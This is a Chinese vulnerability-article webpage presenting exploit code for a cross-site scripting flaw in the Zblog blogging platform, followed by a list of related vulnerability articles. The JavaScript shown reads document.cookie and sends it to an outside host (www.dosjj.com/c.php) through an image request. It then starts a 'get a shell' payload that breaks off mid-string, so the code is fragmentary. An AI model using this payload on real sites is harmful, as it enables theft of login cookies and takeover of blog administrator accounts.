手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >Zblog最新跨站漏洞及利用代码
Zblog最新跨站漏洞及利用代码
摘要:Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向xmlhttp=poster();cookie=document.co...

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

xmlhttp=poster();

cookie=document.cookie;

login=cookie.indexOf(‘password’)==-1?0:1;

tolocation=’/’;

//get cookie

x=new Image();

x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

//get a shell

data=”txaContent=

【Zblog最新跨站漏洞及利用代码】相关文章:

人人网CSRF漏洞曝光及修复方案

DISCUZ X1.5 本地文件包含漏洞

Mambo index.php文件多个跨站脚本执行漏洞

ewebeditor通杀鸡肋0day漏洞

Mysql身份认证漏洞的分析以及利用

Yahoo! 统计功能跨站脚本漏洞

FTP客户端目录遍历漏洞可向任意位置写文件

WordPress 3.3.2鸡肋存储型跨站漏洞的分析

discuz获取任意管理员密码漏洞利用工具vbs版

豆包网的搜索型盲注漏洞与分析及修复方案(图)

精品推荐
分类导航